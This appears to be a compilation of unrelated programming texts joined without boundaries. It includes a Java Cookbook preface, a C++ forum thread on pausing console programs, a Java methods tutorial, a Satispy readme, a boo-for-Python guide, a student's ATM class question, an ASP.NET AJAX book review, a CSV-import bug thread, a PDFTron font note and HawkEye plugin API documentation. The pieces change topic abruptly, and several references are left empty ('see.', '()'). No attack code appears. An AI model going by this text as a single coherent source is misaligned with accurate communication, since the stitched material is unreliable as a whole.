Although his examples are far from Java (he invented a hypothetical assembly language for his examples), many of his discussions of algorithms—of how computers ought to be used to solve real problems—are as relevant today as they were years ago.[4] Though somewhat dated now, the book The Elements of Programming Style, by Kernighan and Plauger, set the style (literally) for a generation of programmers with examples from various structured programming languages. Kernighan and Plauger also wrote a pair of books, Software Tools and Software Tools in Pascal, which demonstrated so much good advice on programming that I used to advise all programmers to read them. However, these three books are dated now; many times I wanted to write a follow-on book in a more modern language, but instead defer to The Practice of Programming, Brian’s follow-on—co-written with Rob Pike—to the Software Tools series. This book continues the Bell Labs (now part of Lucent) tradition of excellence in software textbooks. In Recipe 3.13, I have even adapted one bit of code from their book. See also The Pragmatic Programmer by Andrew Hunt and David Thomas (Addison Wesley). Design Patterns, by Erich Gamma, Richard Helm, Ralph Johnson, and John Vlissides—the “Gang of Four”—is regarded by many as the best book on object-oriented design. I agree; at the very least it’s among the best. Refactoring, by Martin Fowler, covers a lot of “coding cleanups” that can be applied to code to improve readability and maintainability. Just as the GOF book introduced new terminology that helps developers and others communicate about how code is to be designed, Fowler’s book provided a vocabulary for discussing how it is to be improved. Many of the “refactorings” now appear in the Refactoring Menu of the Eclipse IDE (see Recipe 1.3). Two important streams of methodology theories are currently in circulation. The first is collectively known as Agile Methods, and its best-known member is Extreme Programming. XP (the methodology, not last year’s flavor of Microsoft’s OS) is presented in a series of small, short, readable texts led by its designer, Kent Beck.
A good overview of all the Agile methods is Highsmith’s Agile Software Development Ecosystems. The first book in the XP series is Extreme Programming Explained. Another group of important books on methodology, covering the more traditional object-oriented design, is the UML series led by Grady Booch, James Rumbaugh, and Ivar Jacobson. As mentioned earlier, I’ve tested all the code on at least one of the reference platforms, and most on several. Still, there may be platform dependencies, or even bugs, in my code or in some important Java implementation. Please report any errors you find, as well as your suggestions for future editions, by writing to: To ask technical questions or comment on the book, send email to: An O’Reilly web site for the book lists errata, examples, and any additional information. You can access this page at: I also have a personal web site for the book: Both sites list errata and plans for future editions. You’ll also find the source code for all the Java code examples to download; please don’t waste your time typing them again! For specific instructions, see the next section. From my web site, just follow the Downloads link. You are presented with three choices:

1. Download the entire source archive as a single large zip file.
2. Download individual source files, indexed alphabetically as well as by chapter.
3. Download the binary JAR file for the com.darwinsys.* package needed to compile many of the other programs.

Most people will choose either option 1 or 2, but anyone who wants to compile my code will need option 3. See Recipe 1.5 for information on using these files. Downloading the entire source archive yields a large zip file with all the files from the book (and more). This archive can be unpacked with jar (see Recipe 23.4), the free zip program from Info-ZIP, the commercial WinZip or PKZIP, or any compatible tool. The files are organized into subdirectories by topic, with one for strings (Chapter 3), regular expressions (Chapter 4), numbers (Chapter 5), and so on.
The archive also contains the index by name and index by chapter files from the download site, so you can easily find the files you need. Downloading individual files is easy, too: simply follow the links either by file/subdirectory name or by chapter. Once you see the file you want in your browser, use File → Save or the equivalent, or just copy and paste it from the browser into an editor or IDE. The files are updated periodically, so if there are differences between what’s printed in the book and what you get, be glad, for you’ll have received the benefit of hindsight. My life has been touched many times by the flow of the fates bringing me into contact with the right person to show me the right thing at the right time. Steve Munroe, with whom I’ve long since lost touch, introduced me to computers—in particular an IBM 360/30 at the Toronto Board of Education that was bigger than a living room, had 32 or 64K of memory, and had perhaps the power of a PC/XT—in 1970. Herb Kugel took me under his wing at the University of Toronto while I was learning about the larger IBM mainframes that came later. Terry Wood and Dennis Smith at the University of Toronto introduced me to mini- and micro-computers before there was an IBM PC. On evenings and weekends, the Toronto Business Club of Toastmasters International () and Al Lambert’s Canada SCUBA School allowed me to develop my public speaking and instructional abilities. Several people at the University of Toronto, but especially Geoffrey Collyer, taught me the features and benefits of the Unix operating system at a time when I was ready to learn it. Greg Davidson of UCSD taught the first Learning Tree course I attended and welcomed me as a Learning Tree instructor. Years later, when the Oak language was about to be released on Sun’s web site, Greg encouraged me to write to James Gosling and find out about it. 
James’s reply of March 29th, 1995, that the lawyers had made them rename the language to Java and that it was “just now” available for download, is the prized first entry in my saved Java mailbox. Mike Rozek took me on as a Learning Tree course author for a Unix course and two Java courses. After Mike’s departure from the company, Francesco Zamboni, Julane Marx, and Jennifer Urick in turn provided product management of these courses. Jennifer also arranged permission for me to “reuse some code” in this book that had previously been used in my Java course notes. Finally, thanks to the many Learning Tree instructors and students who showed me ways of improving my presentations. I still teach for “The Tree” and recommend their courses for the busy developer who wants to zero in on one topic in detail over four days. Their web site is. Closer to this project, Tim O’Reilly believed in “the little Lint book” when it was just a sample chapter, enabling my early entry into the circle of O’Reilly authors. Years later, Mike Loukides encouraged me to keep trying to find a Java book idea that both he and I could work with. And he stuck by me when I kept falling behind the deadlines. Mike also read the entire manuscript and made many sensible comments, some of which brought flights of fancy down to earth. Jessamyn Read turned many faxed and emailed scratchings of dubious legibility into the quality illustrations you see in this book. And many, many other talented people at O’Reilly helped put this book into the form in which you now see it. I also must thank my first-rate reviewers for the first edition, first and foremost my dear wife Betty Cerar, who still knows more about the caffeinated beverage that I drink while programming than the programming language I use, but whose passion for clear expression and correct grammar has benefited so much of my writing during our life together. 
Jonathan Knudsen, Andy Oram, and David Flanagan commented on the outline when it was little more than a list of chapters and recipes, and yet were able to see the kind of book it could become, and to suggest ways to make it better. Learning Tree instructor Jim Burgess read most of the first edition with a very critical eye on locution, formulation, and code. Bil Lewis and Mike Slinn (mslinn@mslinn.com) made helpful comments on multiple drafts of the book. Ron Hitchens (ron@ronsoft.com) and Marc Loy carefully read the entire final draft of the first edition. I am grateful to Mike Loukides for his encouragement and support throughout the process. Editor Sue Miller helped shepherd the manuscript through the somewhat energetic final phases of production. Sarah Slocombe read the XML chapter in its entirety and made many lucid suggestions; unfortunately time did not permit me to include all of them in the first edition. Each of these people made this book better in many ways, particularly by suggesting additional recipes or revising existing ones. The faults that remain are my own. I used a variety of tools and operating systems in preparing, compiling, and testing the first edition. The developers of OpenBSD (), “the proactively secure Unix-like system,” deserve thanks for making a stable and secure Unix clone that is also closer to traditional Unix than other freeware systems. I used the vi editor (vi on OpenBSD and vim on Windows) while inputting the original manuscript in XML, and Adobe FrameMaker to format the documents. Each of these is an excellent tool in its own way, but I must add a caveat about FrameMaker. Adobe had four years from the release of OS X until I started this book revision cycle during which they could have produced a current Macintosh version of FrameMaker. They did not do so, requiring me to do the revision in the increasingly ancient Classic environment. 
Strangely enough, their Mac sales of FrameMaker dropped steadily during this period, until, during the final production of this book, Adobe officially announced that it would no longer be producing any Macintosh versions of this excellent publishing software, ever. No book on Java would be complete without a quadrium[5] of thanks to James Gosling for inventing the first Unix Emacs, the sc spreadsheet, the NeWS window system, and Java. Thanks also to his employer Sun Microsystems (NASDAQ SUNW) for creating not only the Java language but an incredible array of Java tools and API libraries freely available over the Internet. Thanks to Tom and Nathan for the Perl Cookbook. Without them I might never have come up with the format for this book. Willi Powell of Apple Canada provided Mac OS X access in the early days of OS X; I currently have an Apple notebook of my own. Thanks also to Apple for basing OS X on BSD Unix, making Apple the world's largest-volume commercial Unix company. Thanks to the Tim Horton's Donuts in Bolton, Ontario for great coffee and for not enforcing the 20-minute table limit on the geek with the computer. To each and every one of you, my sincere thanks. [1] The first edition is available today in English, German, French, Polish, Russian, Korean, Traditional Chinese, and Simplified Chinese. My thanks to all the translators for their efforts in making the book available to a wider audience. [2] One of the world's leading high-tech, vendor-independent training companies; see. [3] Note that not all packages named javax.* are extensions: javax.swing and its subpackages—the Swing GUI packages—used to be extensions, but are now core. [4] With apologies for algorithm decisions that are less relevant today given the massive changes in computing power now available.
The problem is (not really a problem) that the program is running too fast and doesn't have anything to stop it from closing. There are a number of options to solve this, most of them are mentioned here -- so if you're using C++ throw a cin.ignore(); and cin.get(); before you return 0; at the end of your program

here at home i'm using dev c++ and i do get the same "problem" i use system("pause") which i think is not preferred by others, but it's just me using it to see the output then i just remove it when i'm at school because there we use visual c++ OR run the program with the command prompt

Don't use system("pause") or getch(). Both are non-portable. Instead, do it the C++ way:

#include <iostream>
#include <limits>

void pause()
{
    std::cout << "Press ENTER to continue... ";
    std::cin.ignore( std::numeric_limits<std::streamsize>::max(), '\n' );
}

Now if you want to pause, just use the function:

#include <iostream>
#include <string>

int main()
{
    using namespace std;
    string name, color;
    cout << "WHAT, is your NAME!?\n";
    getline( cin, name );
    cout << "WHAT, is your favorite COLOR!?\n";
    getline( cin, color );
    cout << "Aaaiiiiiieeeee!\n";
    pause();
}

Hope this helps.

Non-portable means that the code won't work on all systems -- it might compile and work on one system, but that doesn't mean it will compile on all systems.

Using system is a bad idea for pausing. getch() is a lazy excuse. Duoas' solution is good. Use that.

No idea about pause, but the warning is solved by putting a return 0; before the closing } in main:

int main()
{
    // Your code
    return 0;
}

Edit: post double posted. Could an obliging moderator delete this one please?

what does non-portable mean ?? and what does pause(); do?

pause() is a self defined function made by duoas but i think a plain cin.ignore() works fine or maybe it's just me on my compiler though

Sorry about that missing return 0; . Thanks twomers!

The reason I made a pause() function is two-fold: cin.ignore(); is dangerous, because you don't know how it will leave the state of input.
Remember, console input is usually line-buffered, meaning that the user must press ENTER at the end of everything he types. A good UI always tells the user exactly what is expected, then presumes that the user may do something stupid anyway. My pause() function does both. Hope this helps.
A method in Java, like a function in C/C++ (in fact, what C/C++ calls a function is called a method in Java), embeds a few statements. A method is delimited (separated) from the remaining part of the code by a pair of braces. Methods increase reusability: when a method is called a number of times, all of its statements are executed each time. Java also comes with static methods, final methods and abstract methods; all three vary in their functionality. This "Java Method Example" tutorial deals with normal methods. You can refer to this site later for the other kinds.

Java Method Example

public class Demo
{
  public void display()                          // a method without any parameters
  {
    System.out.println("Hello World");
  }

  public void calculate(int length, int height)  // a method with parameters
  {
    System.out.println("Rectangle Area: " + length*height);
  }

  public double show(double radius)              // a method with a parameter and a return value
  {
    System.out.println("Circle Area: " + Math.PI*radius*radius);
    return 2*Math.PI*radius;
  }

  public static void main(String args[])
  {
    Demo d1 = new Demo();                        // create an object to call the methods
    d1.display();
    d1.calculate(10, 20);
    double perimeter = d1.show(5.6);
    System.out.println("Circle Perimeter: " + perimeter);
  }
}

Three methods are given with different variations and called from the main() method. To call an instance method, an object is required; an object d1 of the Demo class is created and used to call all the methods.

1. How to write methods and how to access variables from methods is discussed with good notes in Using Variables from Methods.
2. More in-depth study is available at Using Methods and Method Overloading.
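The tutorial mentions static methods but does not demonstrate one. As a brief sketch (the class and method names here are my own, not from the tutorial), a static method belongs to the class rather than to any instance, so it can be called without creating an object:

```java
public class StaticDemo {
    // static: the method is shared by the class itself,
    // so no object is needed to call it.
    public static int rectangleArea(int length, int height) {
        return length * height;
    }

    public static void main(String[] args) {
        // No "new StaticDemo()" needed, unlike the Demo example above.
        System.out.println("Rectangle Area: " + rectangleArea(10, 20));
    }
}
```

Contrast this with the Demo class above, where an object d1 had to be created first.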
An interface to SAT solver tools (like minisat)

Project description

Satispy is a Python library that aims to be an interface to various SAT (boolean satisfiability) solver applications.

Supported solvers:

- [MiniSAT]() (Linux)
- [Lingeling]() (Linux, Cygwin)

Support for other solvers should be fairly easy as long as they accept the [DIMACS CNF SAT format]().

Installing

You can grab the current version from pypi:

$ sudo pip install satispy

Or you can download a copy from, and run

$ sudo ./setup.py install

in the directory of the project. If you want to develop on the library, use:

$ ./setup.py develop

You can run the tests found in the test folder by running run_tests.py.

How it works

You need a SAT solver and numpy to be installed on your machine for this to work. Let's see an example:

from satispy import Variable, Cnf
from satispy.solver import Minisat

v1 = Variable('v1')
v2 = Variable('v2')
v3 = Variable('v3')
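Since solver support hinges on the DIMACS CNF format mentioned above, here is a small self-contained sketch that parses DIMACS-style clause lines and checks satisfiability by brute force. It is plain Python with no satispy or external solver, purely to illustrate the format — it is not part of satispy's API:

```python
from itertools import product

def parse_dimacs(text):
    """Parse DIMACS CNF text into a list of clauses.

    Each clause is a list of non-zero ints; a negative int means
    the negated variable. 'c' lines are comments, the 'p' line is
    the problem header, and each clause ends with a 0.
    """
    clauses = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(('c', 'p')):
            continue
        lits = [int(tok) for tok in line.split()]
        clauses.append([l for l in lits if l != 0])
    return clauses

def brute_force_sat(clauses):
    """Return a satisfying {var: bool} assignment, or None."""
    vars_ = sorted({abs(l) for c in clauses for l in c})
    for bits in product([False, True], repeat=len(vars_)):
        assign = dict(zip(vars_, bits))
        if all(any(assign[abs(l)] == (l > 0) for l in c) for c in clauses):
            return assign
    return None

# (x1 OR x2) AND (NOT x1 OR x3)
cnf = """c tiny example
p cnf 3 2
1 2 0
-1 3 0
"""
print(brute_force_sat(parse_dimacs(cnf)))
```

Real solvers like MiniSAT read this same format but use far better algorithms than exhaustive enumeration; satispy's job is to translate expressions built from Variable objects into it.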
Learning boo if you are familiar with Python

It might come as no surprise to anyone but I'd better state it here anyway: boo is not python. It looks a lot like python and there's a reason for that: we love python! Specially The dirty hungarian phrasebook

General Tips

The .NET Framework (Windows) or Mono (Linux, Windows, Mac) is required to run or compile boo programs.

.NET Assemblies

Instead of using the python standard library and python modules, you will be using compiled assemblies. You have access to the standard class library that is included with .NET and Mono. There are many 3rd party .NET libraries available as well. See the General Help page for a list of some, as well as pointers to more .NET information.

GUI Toolkits

For GUI programming the two predominant options are System.Windows.Forms and GTK#. See the General Help page for links to tutorials for learning how to use those GUI toolkits.

General things in common with Python

Syntax-wise, boo is very similar to python. Like python, you indent code blocks instead of using curly braces {}. Methods look like python methods (except for the optional static type declarations). See the Language Guide for info on lists, dictionaries, classes, for loops, generators, list comprehensions, etc. Boo also has an Interactive Interpreter like Python.

Duck Typing vs. Static Typing

This is the major functional difference between boo and python (other than the fact that boo runs on .NET and Mono). See Duck Typing for a more in-depth explanation. In Python, everything is duck typed implicitly. Type-specific operations are not resolved until run-time. In boo, everything is implicitly static typed at compile time. You often do not have to explicitly declare the type, due to boo's Type Inference mechanism. For example, you can still simply state "x = 4" instead of having to state "x as int = 4". You can however specify that an object is to be duck typed by explicitly declaring its type as "duck".
Also, boo now has an option that turns on implicit duck typing by default, which makes coding in boo much more like python. Again, see Duck Typing for more info.

Specific Differences Between Python & Boo

Print can be called as a function or as a statement. See Syntactic Macros for other useful macro statements in boo such as assert, debug, using, lock, with, and performTransaction.

Embedding variables in a string

Use a $ sign followed by the variable name, or a $ sign followed by an expression enclosed in parentheses. You can triple quote strings too just like python. See String Operations for more info.

Importing

Importing automatically puts everything into the namespace, just like C#. So when you import an assembly, it is like saying "from MyLibrary import *" in Python. If you import two or more libraries that have the same named item, the compiler will tell you, and you can use the fully qualified name ("MyLibrary.Version" instead of just "Version").

Commenting

Boo supports Python-style commenting, but also C++ commenting.

Lists, Arrays, Slicing, Generators

You can do all the same list operations, list comprehensions, slicing, and generators as in python. Instead of tuples however, there are C-like arrays - fixed length and of a particular type. See Lists And Arrays, Slicing, and Generators for more information.

Dictionaries / Hashtables

In boo, {} is a Boo.Lang.Hash class, which subclasses System.Collections.Hashtable, but it works similar to Python dictionaries. See Hashtables.

No "self" required!

In Python, you use "self" to signify instance variables and instance methods of classes. In boo, you do not need to declare "self" as the first parameter of an instance method of a class. You can still use "self.x", but the self is optional. In boo, "self" basically means the same as "this" in C#.

__init__, __del__ (Constructors & Destructors)

Instead of __init__(self), define a method named "constructor()" in your class.
"destructor()" is used for destructors.

Main & argv (command line arguments)

Instead of Python's if __name__ == "__main__": block, the "main" (or global) part of your script that is executed when run has to be at the bottom of the script, below any import statements, classes, or def functions. See Structure of a Boo Script. "argv" is passed to your script as an array of strings. See examples/download.boo, or you can call Environment.GetCommandLineArgs().

Documentation strings

In Boo, docstrings must start at the same indentation level as the class/method/function/callable definition, and you must use triple quoted strings. There is an advantage to doing it this way. In Boo, we can use docstrings for anything, including properties, fields, namespaces, and modules, as well as classes and functions. See tests/testcases/parser/docstrings_1.boo for a more complete example. We can convert these docstrings into an XML format which the NDoc tool can then use to generate nicely formatted HTML documentation for your code. Or you can try the Monodoc approach instead. You pass it your compiled exe or dll, and write your user documentation externally and separately from your code. This lets you focus on making your code as simple and readable as possible, and not over-cluttering it with docstrings.

true and false

Booleans true and false are not capitalized like in Python. They are lowercase like in C#, javascript, java, and other languages.

char vs. string

In Python, there really is no special "char" type, like in .NET. You just use strings with a single character, like 't'. Since Boo utilizes the .NET Class Library and is statically typed, it needs that distinction, however. char('t') refers to a System.Char type, whereas "t" or 't' is a System.String.

Static vs. Instance fields and methods

In Python, you might refer to a static field shared by all class instances using notation like "MyClass.y". It is the same in boo.
To create a static field or method like this that is shared by all class instances, use the static keyword: "static public y" or "static def mymethod():".

NOTE: Any fields or constants you declare in a class are by default "protected" and not accessible from outside the class (methods or properties are by default public). Add a "public" modifier in front of the field to make it accessible, or else create a property instead (with a getter and setter, see example in a later section).

Named parameters, Assignment Expressions, Set Properties via Constructor

Boo doesn't support named parameters. It does however support setting properties via the call to the constructor of a class. X and Y must refer to public fields or properties, not private or protected fields. You can also see why the constructor in the Point class doesn't need to handle the X and Y parameters itself. In fact your Point class doesn't even need a constructor. If your class doesn't have a constructor, Boo will generate it for you.

Why a colon (:) instead of an equal sign (=)? Because in boo assignments (like x=100) are expressions that are evaluated, not just statements like in python. If you pass "x=100" to a method, for example, it will essentially pass the value 100, after assigning 100 to the variable x.

Boo supports handling a variable number of parameters using the same syntax as python (*params).

__str__ (String representation)

Instead of __str__ or __repr__, define a ToString() method in your class.

Overloading operators: __add__, __mul__

See Operator overloading.

__call__ (Callable)

In Python, you might override the __call__ method in a class to make it callable. In boo, check out options like Callable Types, the ICallable interface, Events, and anonymous Closures.
__ (double underscore) for private variables

Use the private modifier: "private x as int"

Properties (with Getter, Setter)

Instead of x = property(getter, setter), boo uses explicit property syntax with get and set blocks, and you can quickly create a property with the default getter and setter. See the .NET docs on properties for more info.

Decorators/Attributes

Instead of Python decorators, boo has attributes (see .NET's docs on attributes).

__name__, __class__, __file__

See the .NET documentation under System.Reflection on Types and GetType, which let you inspect a class. Instead of __file__, there are related options in the framework.

Pickle (saving and loading objects)

See XML Serialization, especially the bottom example showing how to save and load a dictionary/hashtable.

Things in Python But Not Boo

Importing and dynamic importing (__import__) of other python files

Not available in boo, but see examples/pipeline/AutoImport. You can only import compiled assemblies. The autoimport example compiles the other boo script to an assembly and then imports it.

Note: To combine multiple boo scripts into one boo application, instead of importing one script from another script like in python, you would pass all your boo scripts to the compiler (booc) at the same time. See How To Compile boo scripts. When creating more complex applications in boo that require multiple scripts, I recommend using the SharpDevelop IDE with the boo add-in on Windows, or else NAnt, a .NET build tool similar to java's ant. On Linux, there is now a boo add-in for the MonoDevelop IDE.

Dynamically modify class methods on the fly after creation

The default classes in boo are statically typed. You cannot change or add methods to a class instance at runtime. But using duck typing there are ways to simulate the dynamic behavior of python classes. See the examples below, especially the 2nd and 3rd ones.
- basic duck type example
- Python-like class using IQuackFu
- Dynamic XML object example using IQuackFu
- Dynamic Inheritance - fun with IQuackFu
- System.Remoting, an alternative to IQuackFu in some cases: RealProxy example

Things in Boo but Not Python

- quickly compile boo script to standalone cross-platform exe
- easy super(), and constructor automatically calls super() for you. If you don't have a constructor, one is created for you.
- set class properties via the constructor (constructor doesn't have to handle them explicitly)
- Anonymous Closures - including multi-line closures
- Events, Callable Types
- unless statement: print "good job" unless score < 75
- built-in support for Regular Expressions
- timespan literals (example: t = 10ms)
- extensible compiler pipeline
- custom Syntactic Macros

since boo is statically typed, you get:

- static typing: "x as int" but you can just say "x" (x is an object)
- Interfaces, Enums
- private, public, protected, final, etc. variables & methods
- speed increases - without having to convert your code to a different language like C
- easier interoperability since boo uses standard CLI types (e.g. string is System.String, int is a System.Int32...)
- convert C# and VB.NET to boo code (part of the Boo AddIn For SharpDevelop)

other C#/.NET features you get:

- "lock" (like java's synchronized). See the lock* examples under tests/testcases/semantics/.
- property getters and setters
- using: (automatically disposes of object when you are done using it)
- parameter checking
- [attributes] for functions, fields, classes...
- asynchronous execution, see Asynchronous Design Pattern.
- XML Serialization
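Most of the inline boo samples on this page were lost when it was archived. As a rough, untested sketch (my own reconstruction, not the original examples), the constructor, property, and string-interpolation points above look approximately like this in boo:

```boo
class Point:
    _x as int
    _y as int

    # explicit property with getter and setter
    X as int:
        get:
            return _x
        set:
            _x = value

    Y as int:
        get:
            return _y
        set:
            _y = value

    # "constructor()" instead of Python's __init__(self)
    def constructor(x as int, y as int):
        _x = x
        _y = y

# "main" code goes at the bottom of the script
p = Point(3, 4)
print "point is (${p.X}, ${p.Y})"   # $-interpolation inside a string
```

Treat the exact syntax as an assumption; check the boo Language Guide pages referenced above for the authoritative forms.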
I am supposed to use arrays where I read in data from a text file and I have to set these functions to it. any clues on how i would approach it. my main concern is how to read data from a file using a class while using arrays. i know how to do it in the main function but i am confused about using it with a class. would i read it with a function inside the class? or inside main and pass it into the class (if this is even doable). Please help.. thanks in advance.

#include <iostream>
#include <string>
using namespace std;

class AtmMachine {
public:
    void getAccountNumber();
    void setAccountNumber();
    void getAccountHolderName();
    void setAccountHolderName();
    void getCurrentBalance();
    void setCurrentBalance();
    void add2CurrentBalance();
    void subtractFromCurrentBalance();

private:
    string fName;
    string lName;
    int accountNum;
    int currentBalance;
    int pinNum;
};

int main()
{
    AtmMachine customerAccounts[500]; // the accounts read from the file
    int actualCustomerNumber = 0;     // how many accounts were actually read

    return 0;
}
ASP.NET 3.5 AJAX Unleashed

Introduction

Nowadays, many web developers have implemented AJAX in their web applications, which enables them to create dynamic, rich web sites. There are numerous resources available on the web for learning ASP.NET 3.5 AJAX, but it is always nice to have a book to refer to as and when required. In his latest book, ASP.NET 3.5 AJAX Unleashed, Robert Foster examines the relevant concepts in less than 300 pages, which I think is excellent and rarely achieved by authors. It is hard to write short and crisp content, especially on ASP.NET-related concepts, but Robert has done it very effectively, producing a quality book for budding developers.

Inside the Book

The chapters in Part 1 provide a brief overview of AJAX and introduce the controls shipped with Visual Studio. This section also provides a sneak preview of the AJAX Control Toolkit. The author has provided complete source code along with relevant screenshots.

Part 2 consists of the core chapters, which help you learn ASP.NET 3.5 AJAX starting from the basics. While Chapter 3 examines the ScriptManager and ScriptManagerProxy controls, Chapter 4 provides nice coverage of various namespaces such as Sys, Sys.Net, Sys.Serialization, Sys.UI, etc. Chapters 5 and 6 help you learn about the UpdatePanel and Timer controls, and also some of the advanced techniques associated with the ASP.NET AJAX PageRequestManager object. Chapter 7 provides detailed coverage of the various controls included with the AJAX Control Toolkit with the help of a practical example. The author also examines the role of Expression Web in the development of AJAX applications. I think this chapter will be very useful for beginners. The book then delves deeply into the steps involved in the development of an Extender Control with the help of both server- and client-side controls.
A key feature of the book is that the author has provided detailed analysis in a lucid style along with each bit of source code. Chapter 9 examines the role of SharePoint 2007 in the development of AJAX-based applications. It also includes a practical example which illustrates the development of SharePoint WebParts powered by AJAX. You should be familiar with Gadgets if you work with the Windows Vista operating system, and the final chapter examines the creation of Vista sidebar gadgets with the help of AJAX. It includes a detailed explanation of each step, starting with the creation of a web service and ending with testing the gadget. I would prefer to see the screenshots in color in the next edition of the book.

The book also includes two appendixes, which provide a brief overview of Expression Web and also examine the steps required to deploy .NET 3.5 as a SharePoint feature. I expected a little more advanced content, especially in areas such as LINQ. It would have been helpful if the author had devoted a chapter to discussing the implementation of an AJAX-based billing solution as a mini project.

Conclusion

The book will be useful for beginners and intermediates, and I would recommend it to those developers who would like to learn ASP.NET 3.5 AJAX quickly. This book can also be used by those developers who are averse to reading bulky books. The author has done a terrific job of restricting the content to fewer than 300 pages, and I must say that the book is an ideal supplement to online resources.
Reimporting sections using CSV does not work anymore

Bug Description

The section CSV import help mentions that if you try importing the same CSV twice, nothing changes, and that you can also update timetables by importing a CSV with the same section titles. Well - you can't anymore, because timetable update subscribers are not implemented properly or some events are not firing the way they should, so you get a traceback. Yes, both for XLS and CSV importers I am afraid, though I have yet to test it on XLS to be sure. The instruction currently is: do not import new sections on top of the old ones... Investigate this at least prior to release.

Please double-check this before the Maverick release, Justas.

What traceback? This bug has been dragging so long, does anyone know what problem it is? In flourish, timetables have been changed completely and it is true that you cannot import an old CSV. But some subscribers may be the same and still broken, no idea.

Played around with this one, here's the status: For the old skin, section CSV import is not implemented with new timetables. For the flourish skin, CSV import works, but *always* creates a new section. It works this way because it's unclear what combination of course/

What we can do:

a) Nothing - users just won't use CSV import to modify existing sections. No help text says otherwise.
b) Force users to figure out the section id from the URL in case they want to modify an existing section.
c) Try to guess somehow which sections the user may want to overwrite with each entry in the CSV, list them, make the user choose + "[ ] create new section".
d) something else?

Added section id to csv

Is this still relevant?
#include <TextExtractor.h>

The class includes information about the font, font size, font styles, text color, etc. A high level font object can be instantiated as follows:

In C++: pdftron.PDF.Font f(style.GetFont())

In C#: pdftron.PDF.Font f = new pdftron.PDF.Font(style.GetFont());

The possible font-weight values are 100, 200, 300, 400, 500, 600, 700, 800, or 900, where each number indicates a weight that is at least as dark as its predecessor. A value of 400 indicates a normal weight; 700 indicates bold.

Note: The specific interpretation of these values varies from font to font. For example, 300 in one font may appear most similar to 500 in another.
API for other plugins

Logging Data

It is incredibly easy for other plugins to log their own data to HawkEye so that server owners can see as much information as possible about their server. It takes one import and a single line of code for basic usage.

- Add HawkEye.jar as an External Jar in your IDE.
- Import uk.co.oliwali.HawkEye.util.HawkEyeAPI into any classes where you want to log to HawkEye.

When you want to log something, use the method:

HawkEyeAPI.addCustomEntry(JavaPlugin plugin, String action, Player player, Location location, String data);

Use the action parameter to differentiate between different types of actions your plugin logs. Use only alphanumeric characters and spaces in your action names.

Basic Example using a 'Home' plugin

The following logs to HawkEye every time a player 'goes home'. It logs the 'data' part as the ID of the home in the database. Please note that the following will force your users to use HawkEye (it doesn't check if the plugin is loaded or not).

private void goHome(Player player, Home home) {
    Location loc = home.getLocation();
    player.teleport(loc);
    HawkEyeAPI.addCustomEntry(this, "Go Home", player, loc, home.getId());
}

Other uses of the data field could be for the ban reason in a ban plugin or winner of the fight in a war plugin, for example.

Advanced example that checks if HawkEye is loaded

This example checks if HawkEye exists first, making it optional for your plugin users.

public class MultiHome extends JavaPlugin {

    public boolean usingHawkEye = false;

    public void onEnable() {
        Plugin dl = getServer().getPluginManager().getPlugin("HawkEye");
        if (dl != null) this.usingHawkEye = true;
    }

    private void goHome(Player player, Home home) {
        Location loc = home.getLocation();
        player.teleport(loc);
        if (this.usingHawkEye) HawkEyeAPI.addCustomEntry(this, "Go Home", player, loc, home.getId());
    }

}

Logging normal HawkEye events

The normal HawkEye events like block breaks can all be logged from the API too.
Simply use this API method instead:

HawkEyeAPI.addEntry(JavaPlugin plugin, DataType type, Player player, Location location, String data);

DataType is located at uk.co.oliwali.HawkEye.DataType

Retrieving data

Retrieving data is a little bit more complicated than adding to the database. You need to create your own 'callback' object for the search engine to call once it is done retrieving results. The basic method you need to call is this:

HawkEyeAPI.performSearch(BaseCallback callBack, SearchParser parser, SearchDir dir);

Creating a BaseCallback class

To perform a search you need to use an instance of a class extending BaseCallback. There are two built-in callbacks that you can use if need be, although they are designed for very specific uses inside HawkEye. These can be found in the callbacks package: uk.co.oliwali.HawkEye.callbacks. You will more than likely need to create your own BaseCallback class. This class is outlined here:

public abstract class BaseCallback {

    /**
     * Contains results of the search. This is set automatically before execute() is called
     */
    public List<DataEntry> results = null;

    /**
     * Called when the search is complete
     */
    public abstract void execute();

    /**
     * Called if an error occurs during the search
     */
    public abstract void error(SearchError error, String message);

}

Here is an example of a very simple extension of BaseCallback:

public class SimpleSearch extends BaseCallback {

    private Player player;

    public SimpleSearch(Player player) {
        this.player = player; // store the player so execute() and error() can reach it
        player.sendMessage("Searching database...");
    }

    public void execute() {
        player.sendMessage("Search complete. " + results.size() + " results found");
    }

    public void error(SearchError error, String message) {
        player.sendMessage(message);
    }

}

Creating a SearchParser instance

Obviously you need to give the search engine some parameters to build a query out of. This is done by using the SearchParser class, found here: uk.co.oliwali.HawkEye.SearchParser

There are four constructors available.
Two are mainly for internal HawkEye commands, whilst the others are more general:

- public SearchParser() { } - this is the constructor you will most likely use
- public SearchParser(Player player) { } - use this one if you are searching due to some kind of player input
- public SearchParser(Player player, int radius) { } - this is used for 'radius' searching in HawkEye
- public SearchParser(Player player, List<String> args) throws IllegalArgumentException { } - used for HawkEye user-inputted search parameters

SearchParser contains public fields that you can set to whatever you like. They are all optional, but bear in mind if you supply nothing, you won't get any results! The fields are outlined here:

- public Player player = null; - Player that initiated the search somehow
- public String[] players = null; - Array of player names to search for. Can be partial
- public Vector loc = null; - Location to search around
- public Vector minLoc = null; - Minimum corner of a cuboid to search in
- public Vector maxLoc = null; - Maximum corner of a cuboid to search in
- public Integer radius = null; - Radius to search around
- public List<DataType> actions = new ArrayList<DataType>(); - List of DataType actions to search for
- public String[] worlds = null; - Array of worlds to search for. Can be partial
- public String dateFrom = null; - Date to start the search from
- public String dateTo = null; - Date to end the search at
- public String[] filters = null; - Array of strings to use as filters in the data column

If you set the location and/or radius, you should then call the parseLocations() method to sort out the locations into proper minLoc and maxLoc values. If you set radius but no location and then call parseLocations() you MUST have set player, otherwise you shouldn't have set radius.
Here is an example of a very simple setup of a SearchParser:

SearchParser parser = new SearchParser();
parser.player = player;
parser.radius = 5;
parser.actions = Arrays.asList(DataType.BLOCK_BREAK, DataType.BLOCK_PLACE);
parser.parseLocations();

This will search 5 blocks around the player for block breaks and block places.

SearchDir

SearchDir is an enumerator representing the direction to list search results in. Simply import the class and specify SearchDir.DESC or SearchDir.ASC

Putting it all together

So now we have got our BaseCallback written and our SearchParser instance created, we just need to put it together:

//Setup a SearchParser instance and set values
SearchParser parser = new SearchParser();
parser.player = player;
parser.radius = 5;
parser.actions = Arrays.asList(DataType.BLOCK_BREAK, DataType.BLOCK_PLACE);
parser.parseLocations();

//Call search function
HawkEyeAPI.performSearch(new SimpleSearch(player), parser, SearchDir.DESC);

This will search 5 blocks around the player for block break and block place. When the search is done the callback class tells the player how many results were found.

Facts

